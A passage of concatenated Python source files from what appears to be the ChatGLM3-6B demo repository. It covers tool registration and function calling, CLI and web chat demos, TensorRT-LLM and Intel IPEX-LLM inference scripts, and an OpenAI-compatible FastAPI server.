TypeError(f"Description for `{name}` must be a string") if not isinstance(required, bool): raise TypeError(f"Required for `{name}` must be a bool") tool_params.append({ "name": name, "description": description, "type": typ, "required": required }) tool_def = { "name": tool_name, "description": tool_description, "params": tool_params } print("[registered tool] " + pformat(tool_def)) _TOOL_HOOKS[tool_name] = func _TOOL_DESCRIPTIONS[tool_name] = tool_def return func def dispatch_tool(tool_name: str, tool_params: dict) -> str: if tool_name not in _TOOL_HOOKS: return f"Tool `{tool_name}` not found. Please use a provided tool." tool_call = _TOOL_HOOKS[tool_name] try: ret = tool_call(**tool_params) except: ret = traceback.format_exc() return str(ret) def get_tools() -> dict: return deepcopy(_TOOL_DESCRIPTIONS) # tools Definitions @register_tool def random_number_generator( seed: Annotated[int, 'The random seed used by the generator', True], range: Annotated[tuple[int, int], 'The range of the generated numbers', True], ) -> int: """ Generates a random number x, s.t. range[0] <= x < range[1] """ if not isinstance(seed, int): raise TypeError("Seed must be an integer") if not isinstance(range, tuple): raise TypeError("Range must be a tuple") if not isinstance(range[0], int) or not isinstance(range[1], int): raise TypeError("Range must be a tuple of integers") import random return random.Random(seed).randint(*range) @register_tool def get_weather( city_name: Annotated[str, 'The name of the city to be queried', True], ) -> str: """ Get the current weather for `city_name` """ if not isinstance(city_name, str): raise TypeError("City name must be a string") key_selection = { "current_condition": ["temp_C", "FeelsLikeC", "humidity", "weatherDesc", "observation_time"], } import requests try: resp = requests.get(f"https://wttr.in/{city_name}?format=j1") resp.raise_for_status() resp = resp.json() ret = {k: {_v: resp[k][0][_v] for _v in v} for k, v in key_selection.items()} except: import traceback ret = "Error encountered while fetching weather data!\n" + traceback.format_exc() return str(ret) if __name__ == "__main__": print(dispatch_tool("get_weather", {"city_name": "beijing"})) print(get_tools()) File: tools_using_demo/cli_demo_tool.py """ This demo script is designed for interacting with the ChatGLM3-6B in Function, to show Function Call capabilities. """ import os import platform import torch from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False def build_prompt(history): prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt tools = [ {'name': 'track', 'description': '追踪指定股票的实时价格', 'parameters': { 'type': 'object', 'properties': {'symbol': { 'description': '需要追踪的股票代码' } }, 'required': [] } }, { 'name': '/text-to-speech', 'description': '将文本转换为语音', 'parameters': { 'type': 'object', 'properties': { 'text': { 'description': '需要转换成语音的文本' }, 'voice': { 'description': '要使用的语音类型(男声、女声等)' }, 'speed': { 'description': '语音的速度(快、中等、慢等)' } }, 'required': [] } }, { 'name': '/image_resizer', 'description': '调整图片的大小和尺寸', 'parameters': {'type': 'object', 'properties': { 'image_file': { 'description': '需要调整大小的图片文件' }, 'width': { 'description': '需要调整的宽度值' }, 'height': { 'description': '需要调整的高度值' } }, 'required': [] } }, { 'name': '/foodimg', 'description': '通过给定的食品名称生成该食品的图片', 'parameters': { 'type': 'object', 'properties': { 'food_name': { 'description': '需要生成图片的食品名称' } }, 'required': [] } } ] system_item = { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } def main(): past_key_values, history = None, [system_item] role = "user" global stop_stream print("欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序") while True: query = input("\n用户:") if role == "user" else input("\n结果:") if query.strip() == "stop": break if query.strip() == "clear": past_key_values, history = None, [system_item] role = "user" os.system(clear_command) print("欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序") continue print("\nChatGLM:", end="") response, history = model.chat(tokenizer, query, history=history, role=role) print(response, end="", flush=True) print("") if isinstance(response, dict): role = "observation" else: role = "user" if __name__ == "__main__": main() File: tools_using_demo/openai_api_demo.py import json from openai import OpenAI from colorama import init, Fore from loguru import logger from tool_register import get_tools, dispatch_tool init(autoreset=True) client = OpenAI( base_url="http://127.0.0.1:8000/v1", api_key = "xxx" ) tools = get_tools() def run_conversation(query: str, stream=False, tools=None, max_retry=5): params = dict(model="chatglm3", messages=[{"role": "user", "content": query}], stream=stream) if tools: params["tools"] = tools response = client.chat.completions.create(**params) for _ in range(max_retry): if not stream: if response.choices[0].message.function_call: function_call = response.choices[0].message.function_call logger.info(f"Function Call Response: {function_call.model_dump()}") function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(function_call.name, function_args) logger.info(f"Tool Call Response: {tool_response}") params["messages"].append(response.choices[0].message) params["messages"].append( { "role": "function", "name": function_call.name, "content": tool_response, # 调用函数返回结果 } ) else: reply = response.choices[0].message.content logger.info(f"Final Reply: \n{reply}") return else: output = "" for chunk in response: content = chunk.choices[0].delta.content or "" print(Fore.BLUE + content, end="", flush=True) output += content if chunk.choices[0].finish_reason == "stop": return elif chunk.choices[0].finish_reason == "function_call": print("\n") function_call = chunk.choices[0].delta.function_call logger.info(f"Function Call Response: {function_call.model_dump()}") function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(function_call.name, function_args) logger.info(f"Tool Call Response: {tool_response}") params["messages"].append( { "role": "assistant", "content": output } ) params["messages"].append( { "role": "function", "name": function_call.name, "content": tool_response, } ) break response = client.chat.completions.create(**params) if __name__ == "__main__": query = "你是谁" run_conversation(query, stream=True) logger.info("\n=========== next conversation ===========") query = "帮我查询北京的天气怎么样" run_conversation(query, tools=tools, stream=True) File: tensorrt_llm_demo/tensorrt_llm_cli_demo.py """ This script is a part of a larger project for generating text using large language models. It includes functionalities for finding engine files, parsing arguments, setting up configurations for different models, and executing the generation process with various settings. This script particularly supports models like ChatGLM3-6B and its variants, handling quantization, serialization, and runtime aspects. Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved. Modifications made by Yuxuan.Zhang @ ZhipuAI on 2023-12-24. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Modifications: 1. Removed input_file, tokenizer_type, and other parameters unrelated to dialogue. Set num_beams to 1. 2. Adapted single turn dialogue into ChatGLM3-6B template and implemented multi-turn conversations. """ import argparse import json import torch import transformers from pathlib import Path from typing import List import tensorrt_llm from tensorrt_llm.quantization import QuantMode from tensorrt_llm.runtime import (GenerationSession, ModelConfig, SamplingConfig) def find_engines(dir: Path, model_name: str = "*", dtype: str = "*", tp_size: str = "*", rank: str = "*") -> List[Path]: """ Searches for engine files matching a specified pattern within a directory. This is typically used to locate compiled model files for efficient execution on specific hardware. Parameters: - dir: The directory to search. - model_name, dtype, tp_size, rank: Pattern matching parameters to filter engine files by model name, data type, tensor parallel size, and rank respectively. Returns: - A list of Paths pointing to the engine files. """ template = f"{model_name}_{dtype}_tp{tp_size}_rank{rank}.engine" return list(dir.glob(template)) def parse_arguments(args=None): parser = argparse.ArgumentParser() parser.add_argument('--model_name', type=str, choices=[ "chatglm3_6b", "chatglm3_6b_base", "chatglm3_6b_32k" ], default="chatglm3_6b", help='the name of the model') parser.add_argument('--max_output_len', type=int, default=4096) parser.add_argument('--engine_dir', type=str, default=None) parser.add_argument('--tokenizer_dir', type=str, default=None) parser.add_argument('--temperature', type=float, default=0.95) parser.add_argument('--top_k', type=int, default=1) parser.add_argument('--top_p', type=float, default=0.8) parser.add_argument('--random_seed', type=int, default=2023) parser.add_argument('--streaming', default=True, action='store_true') args = parser.parse_args(args) return args def main(): """ The main execution function of the script. It orchestrates the text generation process by performing several key steps: - Parses command-line arguments to configure model details, output specifications, and other user-defined parameters. - Loads the model configuration from a specified directory and prepares the environment for text generation based on the model and hardware specifics. - Sets up the generation session with the appropriate model, tokenizer, and runtime configurations. - Enters a loop to continuously accept user input, generate text based on the provided prompts, and output the model's responses. - Handles special commands such as 'stop' to end the conversation and 'clear' to reset the chat history. - Manages resources and ensures that the generated text is properly formatted and presented to the user. The function is designed to be the entry point of the script, invoking all necessary components and managing the flow of data and control throughout the execution. """ args = parse_arguments() config_path = Path(args.engine_dir) / 'config.json' with open(config_path, 'r') as f: config = json.load(f) dtype = config['builder_config']['precision'] max_output_len = min(config['builder_config']['max_output_len'], args.max_output_len) use_gpt_attention_plugin = config['plugin_config']['gpt_attention_plugin'] remove_input_padding = config['builder_config']['remove_input_padding'] tp_size = config['builder_config']['tensor_parallel'] pp_size = config['builder_config']['pipeline_parallel'] world_size = tp_size * pp_size assert world_size == tensorrt_llm.mpi_world_size(), f'Engine world size ({tp_size} * {pp_size}) != Runtime world size ({tensorrt_llm.mpi_world_size()})' max_output_len = min(max_output_len, args.max_output_len) runtime_rank = tensorrt_llm.mpi_rank() runtime_mapping = tensorrt_llm.Mapping(world_size, runtime_rank, tp_size=world_size) torch.cuda.set_device(runtime_rank % runtime_mapping.gpus_per_node) serialize_path = find_engines( dir=Path(args.engine_dir), model_name=args.model_name, dtype=dtype, tp_size=world_size, rank=runtime_rank)[0] tokenizer = transformers.AutoTokenizer.from_pretrained(args.tokenizer_dir, trust_remote_code=True) model_config = ModelConfig(vocab_size=config['builder_config']['vocab_size'], num_layers=config['builder_config']['num_layers'], num_heads=config['builder_config']['num_heads'] // tp_size, num_kv_heads=(config['builder_config']['num_kv_heads'] + tp_size - 1) // tp_size, hidden_size=config['builder_config']['hidden_size'] // tp_size, gpt_attention_plugin=use_gpt_attention_plugin, remove_input_padding=config['builder_config']['remove_input_padding'], model_name=args.model_name, paged_kv_cache=config['builder_config']['paged_kv_cache'], quant_mode=QuantMode(config['builder_config']['quant_mode']), dtype=dtype) sampling_config = SamplingConfig( end_id=tokenizer.eos_token_id, pad_id=tokenizer.pad_token_id, num_beams=1, temperature=args.temperature, top_k=args.top_k, top_p=args.top_p ) sampling_config.random_seed = args.random_seed with open(serialize_path, 'rb') as f: engine_buffer = f.read() session = GenerationSession decoder = session(model_config, engine_buffer, runtime_mapping) history = [] while True: input_text_with_history = "" max_input_len = config['builder_config']['max_input_len'] input_text = input("用户: ") if input_text.lower() == 'stop': break if input_text.lower() == 'clear': history = [] print("ChatGLM3-6B: 对话历史已清空") continue history.append(input_text) for idx, content in enumerate(history): if idx % 2 != 0: input_text_with_history += "{}\n".format(content) else: input_text_with_history += "<|user|>{}\n<|assistant|>".format(content) tokenized = tokenizer( input_text_with_history, return_tensors="pt", padding=True, return_length=True ) input_ids = tokenized['input_ids'].int() input_lengths = tokenized['length'].int() max_input_len_real = torch.max(input_lengths) if max_input_len_real > max_input_len: input_ids = input_ids[:, :max_input_len] input_lengths = torch.where(input_lengths > max_input_len, max_input_len, input_lengths) else: max_input_len = max_input_len_real if remove_input_padding: input_ids_no_padding = (torch.zeros(1, torch.sum(input_lengths), dtype=torch.int32)) lengths_acc = torch.cumsum(torch.cat([torch.IntTensor([0]), input_lengths]), dim=0) for i in range(len(input_ids)): input_ids_no_padding[0, lengths_acc[i]:lengths_acc[i + 1]] = torch.IntTensor( input_ids[i, max_input_len - input_lengths[i]:max_input_len]) input_ids = input_ids_no_padding elif use_gpt_attention_plugin: input_ids_padding_right = torch.zeros_like(input_ids) + sampling_config.end_id for i, sample in enumerate(input_ids): nPadding = 0 for token in sample: if token == sampling_config.pad_id: nPadding += 1 else: break input_ids_padding_right[i, :len(sample[nPadding:])] = sample[nPadding:] input_ids = input_ids_padding_right input_lengths = torch.tensor([input_ids.shape[-1]], dtype=torch.int32) decoder.setup(1, max_input_len, max_output_len, 1) output = decoder.decode( input_ids.contiguous().cuda(), input_lengths.contiguous().cuda(), sampling_config, output_sequence_lengths=True, return_dict=True, streaming=args.streaming ) print("ChatGLM3-6B:", end="") generated_text = "" if args.streaming: for output_item in output: output_id = output_item["output_ids"] output_sequence_lengths = output_item["sequence_lengths"] output_id = output_id[0, 0, output_sequence_lengths[0, 0] - 1] output_word = tokenizer.convert_ids_to_tokens(int(output_id)) output_word = output_word.replace("▁", " ") output_word = tokenizer.convert_tokens_to_string(output_word) print(output_word, end="", flush=True) generated_text += output_word print("\n") else: torch.cuda.synchronize() output_ids = output["output_ids"][0] output = output_ids[0, input_lengths.item():] generated_text = tokenizer.decode(output, skip_special_tokens=True) print(generated_text) history.append(generated_text) del decoder print(f"Good bye!") if __name__ == '__main__': main() File: Intel_device_demo/ipex_llm_cpu_demo/chatglm3_web_demo.py """ This script creates an interactive web demo for the ChatGLM3-6B model using Gradio, a Python library for building quick and easy UI components for machine learning models. It's designed to showcase the capabilities of the ChatGLM3-6B model in a user-friendly interface, allowing users to interact with the model through a chat-like interface. Usage: - Run the script to start the Gradio web server. - Interact with the model by typing questions and receiving responses. Requirements: - Gradio (required for 4.13.0 and later, 3.x is not support now) should be installed. Note: The script includes a modification to the Chatbot's postprocess method to handle markdown to HTML conversion, ensuring that the chat interface displays formatted text correctly. """ import os import streamlit as st from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer st.set_page_config( page_title="ChatGLM3-6B+BigDL-LLM demo", page_icon=":robot:", layout="wide" ) MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') @st.cache_resource def get_model(): model = AutoModel.from_pretrained(MODEL_PATH, load_in_4bit=True, trust_remote_code=True) tokenizer = AutoTokenizer.from_pretrained(MODEL_PATH, trust_remote_code=True) return tokenizer, model tokenizer, model = get_model() if "history" not in st.session_state: st.session_state.history = [] if "past_key_values" not in st.session_state: st.session_state.past_key_values = None max_length = st.sidebar.slider("max_length", 0, 32768, 8192, step=1) top_p = st.sidebar.slider("top_p", 0.0, 1.0, 0.8, step=0.01) temperature = st.sidebar.slider("temperature", 0.0, 1.0, 0.6, step=0.01) buttonClean = st.sidebar.button("clearing session history", key="clean") if buttonClean: st.session_state.history = [] st.session_state.past_key_values = None st.rerun() for i, message in enumerate(st.session_state.history): if message["role"] == "user": with st.chat_message(name="user", avatar="user"): st.markdown(message["content"]) else: with st.chat_message(name="assistant", avatar="assistant"): st.markdown(message["content"]) with st.chat_message(name="user", avatar="user"): input_placeholder = st.empty() with st.chat_message(name="assistant", avatar="assistant"): message_placeholder = st.empty() prompt_text = st.chat_input("please enter your question.") if prompt_text: input_placeholder.markdown(prompt_text) history = st.session_state.history past_key_values = st.session_state.past_key_values for response, history, past_key_values in model.stream_chat( tokenizer, prompt_text, history, past_key_values=past_key_values, max_length=max_length, top_p=top_p, temperature=temperature, return_past_key_values=True, ): message_placeholder.markdown(response) st.session_state.history = history st.session_state.past_key_values = past_key_values File: Intel_device_demo/ipex_llm_cpu_demo/generate.py import torch import time import argparse import numpy as np from ipex_llm.transformers import AutoModel from modelscope import AutoTokenizer from transformers import AutoTokenizer # you could tune the prompt based on your own model, # here the prompt tuning refers to https://github.com/THUDM/ChatGLM3/blob/main/PROMPT.md CHATGLM_V3_PROMPT_FORMAT = "<|user|>\n{prompt}\n<|assistant|>" if __name__ == '__main__': parser = argparse.ArgumentParser(description='Predict Tokens using `generate()` API for ModelScope ChatGLM3 model') parser.add_argument('--repo-id-or-model-path', type=str, default="ZhipuAI/chatglm3-6b", help='The ModelScope repo id for the ChatGLM3 model to be downloaded' ', or the path to the ModelScope checkpoint folder') parser.add_argument('--prompt', type=str, default="AI是什么?", help='Prompt to infer') parser.add_argument('--n-predict', type=int, default=32, help='Max tokens to predict') args = parser.parse_args() model_path = args.repo_id_or_model_path # Load model in 4 bit, # which convert the relevant layers in the model into INT4 format # It is important to set `model_hub='modelscope'`, otherwise model hub is default to be huggingface model = AutoModel.from_pretrained(model_path, load_in_4bit=True, trust_remote_code=True, model_hub='modelscope') # Load tokenizer tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True) # Generate predicted tokens with torch.inference_mode(): prompt = CHATGLM_V3_PROMPT_FORMAT.format(prompt=args.prompt) input_ids = tokenizer.encode(prompt, return_tensors="pt") st = time.time() # if your selected model is capable of utilizing previous key/value attentions # to enhance decoding speed, but has `"use_cache": false` in its model config, # it is important to set `use_cache=True` explicitly in the `generate` function # to obtain optimal performance with IPEX-LLM INT4 optimizations output = model.generate(input_ids, max_new_tokens=args.n_predict) end = time.time() output_str = tokenizer.decode(output[0], skip_special_tokens=True) print(f'Inference time: {end - st} s') print('-' * 20, 'Prompt', '-' * 20) print(prompt) print('-' * 20, 'Output', '-' * 20) print(output_str) File: Intel_device_demo/ipex_llm_cpu_demo/chatglm3_infer.py import time from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer CHATGLM_V3_PROMPT_FORMAT = "\n{prompt}\n" # Please specify the local path to the chatglm3-6b model model_path = "D:\AI\ChatGLM3\model/chatglm3-6b/" # Load the ChatGLM3-6B model and quantize it to INT4 model = AutoModel.from_pretrained(model_path, load_in_4bit=True, trust_remote_code=True) # Load the tokenizer tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True) # Prepare ChatGLM3 format prompt prompt = CHATGLM_V3_PROMPT_FORMAT.format(prompt="Who are you?") # Encode the prompt input_ids = tokenizer.encode(prompt, return_tensors="pt") st = time.time() # Perform inference calculation and generate Tokens output = model.generate(input_ids,max_new_tokens=32) end = time.time() # Decode the generated Tokens and display them output_str = tokenizer.decode(output[0], skip_special_tokens=True) print(f'Inference time: {end-st} s') print('-'*20, 'Prompt', '-'*20) print(prompt) print('-'*20, 'Output', '-'*20) print(output_str) File: Intel_device_demo/ipex_llm_cpu_demo/api_server.py """ This script implements an API for the ChatGLM3-6B model, formatted similarly to OpenAI's API (https://platform.openai.com/docs/api-reference/chat). It's designed to be run as a web server using FastAPI and uvicorn, making the ChatGLM3-6B model accessible through OpenAI Client. Key Components and Features: - Model and Tokenizer Setup: Configures the model and tokenizer paths and loads them. - FastAPI Configuration: Sets up a FastAPI application with CORS middleware for handling cross-origin requests. - API Endpoints: - "/v1/models": Lists the available models, specifically ChatGLM3-6B. - "/v1/chat/completions": Processes chat completion requests with options for streaming and regular responses. - "/v1/embeddings": Processes Embedding request of a list of text inputs. - Token Limit Caution: In the OpenAI API, 'max_tokens' is equivalent to HuggingFace's 'max_new_tokens', not 'max_length'. For instance, setting 'max_tokens' to 8192 for a 6b model would result in an error due to the model's inability to output that many tokens after accounting for the history and prompt tokens. - Stream Handling and Custom Functions: Manages streaming responses and custom function calls within chat responses. - Pydantic Models: Defines structured models for requests and responses, enhancing API documentation and type safety. - Main Execution: Initializes the model and tokenizer, and starts the FastAPI app on the designated host and port. Note: This script doesn't include the setup for special tokens or multi-GPU support by default. Users need to configure their special tokens and can enable multi-GPU support as per the provided instructions. Embedding Models only support in One GPU. """ import os import time import tiktoken import torch import uvicorn from fastapi import FastAPI, HTTPException, Response from fastapi.middleware.cors import CORSMiddleware from contextlib import asynccontextmanager from typing import List, Literal, Optional, Union from loguru import logger from pydantic import BaseModel, Field from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer from utils import process_response, generate_chatglm3, generate_stream_chatglm3 # from sentence_transformers import SentenceTransformer from sse_starlette.sse import EventSourceResponse # Set up limit request time EventSourceResponse.DEFAULT_PING_INTERVAL = 1000 # set LLM path MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) # set Embedding Model path EMBEDDING_PATH = os.environ.get('EMBEDDING_PATH', 'BAAI/bge-large-zh-v1.5') @asynccontextmanager async def lifespan(app: FastAPI): yield if torch.cuda.is_available(): torch.cuda.empty_cache() torch.cuda.ipc_collect() app = FastAPI(lifespan=lifespan) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ModelCard(BaseModel): id: str object: str = "model" created: int = Field(default_factory=lambda: int(time.time())) owned_by: str = "owner" root: Optional[str] = None parent: Optional[str] = None permission: Optional[list] = None class ModelList(BaseModel): object: str = "list" data: List[ModelCard] = [] class FunctionCallResponse(BaseModel): name: Optional[str] = None arguments: Optional[str] = None class ChatMessage(BaseModel): role: Literal["user", "assistant", "system", "function"] content: str = None name: Optional[str] = None function_call: Optional[FunctionCallResponse] = None class DeltaMessage(BaseModel): role: Optional[Literal["user", "assistant", "system"]] = None content: Optional[str] = None function_call: Optional[FunctionCallResponse] = None ## for Embedding class EmbeddingRequest(BaseModel): input: List[str] model: str class CompletionUsage(BaseModel): prompt_tokens: int completion_tokens: int total_tokens: int class EmbeddingResponse(BaseModel): data: list model: str object: str usage: CompletionUsage # for ChatCompletionRequest class UsageInfo(BaseModel): prompt_tokens: int = 0 total_tokens: int = 0 completion_tokens: Optional[int] = 0 class ChatCompletionRequest(BaseModel): model: str messages: List[ChatMessage] temperature: Optional[float] = 0.8 top_p: Optional[float] = 0.8 max_tokens: Optional[int] = None stream: Optional[bool] = False tools: Optional[Union[dict, List[dict]]] = None repetition_penalty: Optional[float] = 1.1 class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage finish_reason: Literal["stop", "length", "function_call"] class ChatCompletionResponseStreamChoice(BaseModel): delta: DeltaMessage finish_reason: Optional[Literal["stop", "length", "function_call"]] index: int class ChatCompletionResponse(BaseModel): model: str id: str object: Literal["chat.completion", "chat.completion.chunk"] choices: List[Union[ChatCompletionResponseChoice, ChatCompletionResponseStreamChoice]] created: Optional[int] = Field(default_factory=lambda: int(time.time())) usage: Optional[UsageInfo] = None @app.get("/health") async def health() -> Response: """Health check.""" return Response(status_code=200) @app.post("/v1/embeddings", response_model=EmbeddingResponse) async def get_embeddings(request: EmbeddingRequest): embeddings = [embedding_model.encode(text) for text in request.input] embeddings = [embedding.tolist() for embedding in embeddings] def num_tokens_from_string(string: str) -> int: """ Returns the number of tokens in a text string. use cl100k_base tokenizer """ encoding = tiktoken.get_encoding('cl100k_base') num_tokens = len(encoding.encode(string)) return num_tokens response = { "data": [ { "object": "embedding", "embedding": embedding, "index": index } for index, embedding in enumerate(embeddings) ], "model": request.model, "object": "list", "usage": CompletionUsage( prompt_tokens=sum(len(text.split()) for text in request.input), completion_tokens=0, total_tokens=sum(num_tokens_from_string(text) for text in request.input), ) } return response @app.get("/v1/models", response_model=ModelList) async def list_models(): model_card = ModelCard( id="chatglm3-6b" ) return ModelList( data=[model_card] ) @app.post("/v1/chat/completions", response_model=ChatCompletionResponse) async def create_chat_completion(request: ChatCompletionRequest): global model, tokenizer if len(request.messages) < 1 or request.messages[-1].role == "assistant": raise HTTPException(status_code=400, detail="Invalid request") gen_params = dict( messages=request.messages, temperature=request.temperature, top_p=request.top_p, max_tokens=request.max_tokens or 1024, echo=False, stream=request.stream, repetition_penalty=request.repetition_penalty, tools=request.tools, ) logger.debug(f"==== request ====\n{gen_params}") if request.stream: # Use the stream mode to read the first few characters, if it is not a function call, direct stram output predict_stream_generator = predict_stream(request.model, gen_params) output = next(predict_stream_generator) if not contains_custom_function(output): return EventSourceResponse(predict_stream_generator, media_type="text/event-stream") # Obtain the result directly at one time and determine whether tools needs to be called. logger.debug(f"First result output:\n{output}") function_call = None if output and request.tools: try: function_call = process_response(output, use_tool=True) except: logger.warning("Failed to parse tool call") # CallFunction if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) """ In this demo, we did not register any tools. You can use the tools that have been implemented in our `tools_using_demo` and implement your own streaming tool implementation here. Similar to the following method: function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(tool_name: str, tool_params: dict) """ tool_response = "" if not gen_params.get("messages"): gen_params["messages"] = [] gen_params["messages"].append(ChatMessage( role="assistant", content=output, )) gen_params["messages"].append(ChatMessage( role="function", name=function_call.name, content=tool_response, )) # Streaming output of results after function calls generate = predict(request.model, gen_params) return EventSourceResponse(generate, media_type="text/event-stream") else: # Handled to avoid exceptions in the above parsing function process. generate = parse_output_text(request.model, output) return EventSourceResponse(generate, media_type="text/event-stream") # Here is the handling of stream = False response = generate_chatglm3(model, tokenizer, gen_params) # Remove the first newline character if response["text"].startswith("\n"): response["text"] = response["text"][1:] response["text"] = response["text"].strip() usage = UsageInfo() function_call, finish_reason = None, "stop" if request.tools: try: function_call = process_response(response["text"], use_tool=True) except: logger.warning("Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): finish_reason = "function_call" function_call = FunctionCallResponse(**function_call) message = ChatMessage( role="assistant", content=response["text"], function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) logger.debug(f"==== message ====\n{message}") choice_data = ChatCompletionResponseChoice( index=0, message=message, finish_reason=finish_reason, ) task_usage = UsageInfo.model_validate(response["usage"]) for usage_key, usage_value in task_usage.model_dump().items(): setattr(usage, usage_key, getattr(usage, usage_key) + usage_value) return ChatCompletionResponse( model=request.model, id="", # for open_source model, id is empty choices=[choice_data], object="chat.completion", usage=usage ) async def predict(model_id: str, params: dict): global model, tokenizer choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant"), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) previous_text = "" for new_response in generate_stream_chatglm3(model, tokenizer, params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(previous_text):] previous_text = decoded_unicode finish_reason = new_response["finish_reason"] if len(delta_text) == 0 and finish_reason != "function_call": continue function_call = None if finish_reason == "function_call": try: function_call = process_response(decoded_unicode, use_tool=True) except: logger.warning( "Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) delta = DeltaMessage( content=delta_text, role="assistant", function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=delta, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def predict_stream(model_id, gen_params): """ The function call is compatible with stream mode output. The first seven characters are determined. If not a function call, the stream output is directly generated. Otherwise, the complete character content of the function call is returned. :param model_id: :param gen_params: :return: """ output = "" is_function_call = False has_send_first_chunk = False for new_response in generate_stream_chatglm3(model, tokenizer, gen_params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(output):] output = decoded_unicode # When it is not a function call and the character length is> 7, # try to judge whether it is a function call according to the special function prefix if not is_function_call and len(output) > 7: # Determine whether a function is called is_function_call = contains_custom_function(output) if is_function_call: continue # Non-function call, direct stream output finish_reason = new_response["finish_reason"] # Send an empty string first to avoid truncation by subsequent next() operations. if not has_send_first_chunk: message = DeltaMessage( content="", role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) send_msg = delta_text if has_send_first_chunk else output has_send_first_chunk = True message = DeltaMessage( content=send_msg, role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) if is_function_call: yield output else: yield '[DONE]' async def parse_output_text(model_id: str, value: str): """ Directly output the text content of value :param model_id: :param value: :return: """ choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant", content=value), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def contains_custom_function(value: str) -> bool: """ Determine whether 'function_call' according to a special function prefix. For example, the functions defined in "tools_using_demo/tool_register.py" are all "get_xxx" and start with "get_" [Note] This is not a rigorous judgment method, only for reference. :param value: :return: """ return value and 'get_' in value if __name__ == "__main__": # Load LLM tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, load_in_4bit=True, trust_remote_code=True) # load Embedding # embedding_model = SentenceTransformer(EMBEDDING_PATH, device="cuda") uvicorn.run(app, host='0.0.0.0', port=8000, workers=1) File: Intel_device_demo/ipex_llm_cpu_demo/utils.py import gc import json import torch from transformers import PreTrainedModel, PreTrainedTokenizer from transformers.generation.logits_process import LogitsProcessor from typing import Union, Tuple class InvalidScoreLogitsProcessor(LogitsProcessor): def __call__( self, input_ids: torch.LongTensor, scores: torch.FloatTensor ) -> torch.FloatTensor: if torch.isnan(scores).any() or torch.isinf(scores).any(): scores.zero_() scores[..., 5] = 5e4 return scores def process_response(output: str, use_tool: bool = False) -> Union[str, dict]: content = "" for response in output.split("<|assistant|>"): metadata, content = response.split("\n", maxsplit=1) if not metadata.strip(): content = content.strip() content = 